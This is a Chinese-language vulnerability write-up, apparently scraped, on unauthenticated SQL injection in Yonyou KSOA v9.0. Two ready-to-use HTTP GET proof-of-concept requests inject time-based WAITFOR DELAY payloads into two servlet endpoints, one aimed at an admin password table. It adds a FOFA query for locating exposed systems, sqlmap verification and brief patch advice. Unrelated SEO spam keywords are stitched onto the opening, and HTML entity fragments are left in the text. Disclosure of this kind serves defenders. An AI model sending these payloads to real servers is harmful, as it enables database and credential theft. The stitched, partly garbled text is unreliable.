搜狐快站建站教程,东莞百度网站快速排名,自动生成作文网站,网站建设与管理 十四五国规教材0x01 产品简介 用友时空KSOA是建立在SOA理念指导下研发的新一代产品#xff0c;是根据流通企业最前沿的I需求推出的统一的IT基础架构#xff0c;它可以让流通企业各个时期建立的IT系统之间彼此轻松对话#xff0c;帮助流通企业保护原有的IT投资#xff0c;简化IT管理#…0x01 产品简介 用友时空KSOA是建立在SOA理念指导下研发的新一代产品是根据流通企业最前沿的I需求推出的统一的IT基础架构它可以让流通企业各个时期建立的IT系统之间彼此轻松对话帮助流通企业保护原有的IT投资简化IT管理提升竞争能力确保企业整体的战略目标以及创新活动的实现。
0x02 漏洞概述 用友时空KSOA /servlet/com.sksoft.v8.trans.servlet.TaskRequestServlet接口和/servlet/imagefield接口处存在sql注入漏洞未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证最终可能导致服务器失陷。
0x03 影响范围
用友时空 KSOA v9.0
0x04 复现环境
FOFAapp用友-时空KSOA 0x05 漏洞复现
PoC-1
GET /servlet/imagefield?keyreadimagesImgnamepasswordsTablenamebbs_adminsKeynameidsKeyvalue-1%27;WAITFOR%20DELAY%20%270:0:10%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,
like Gecko)
Accept-Encoding: gzip, deflate
Connection: close
构造注入延时10秒 sqlmap验证 PoC-2
GET /servlet/com.sksoft.v8.trans.servlet.TaskRequestServlet?unitid1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,
like Gecko)
Accept-Encoding: gzip, deflate
Connection: close sqlmap验证 0x06 修复建议
临时缓解方案
限制访问来源地址如非必要不要将系统开放在互联网上。
升级修复方案
升级至安全版本或打补丁。